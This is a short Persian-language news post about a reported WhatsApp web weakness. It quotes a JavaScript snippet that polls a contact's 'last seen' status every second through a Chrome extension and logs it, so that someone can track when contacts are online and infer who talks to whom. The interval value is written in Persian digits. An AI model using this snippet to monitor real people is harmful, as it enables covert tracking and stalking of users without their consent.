آقای Robert Heaton در وبلاگش خبر از کشف باگی جدید در نرم افزار واتساپ داده که با اکسپلویت آن میتوان به صحبت کردن همزمان دو کاربر پیبرد.
وی از طریق افزونه گوگل کروم و کدهای زیر موفق به انجام این کار شده است:
setInterval(function() {
var lastSeen = $('.pane-header .chat-body .emojitext').last().text();
console.log(Math.floor(Date.now() / 1000) + ", " + lastSeen);
}, ۱۰۰۰);
با این آسیب پذیری چه کاری میشه انجام داد؟
با این آسیبپذیری نمیشه به چت و پیام کاربران دسترسی داشت ولی وضعیت آنلاین یا آفلاین هر مخاطبی را میتومان لاگ کرد.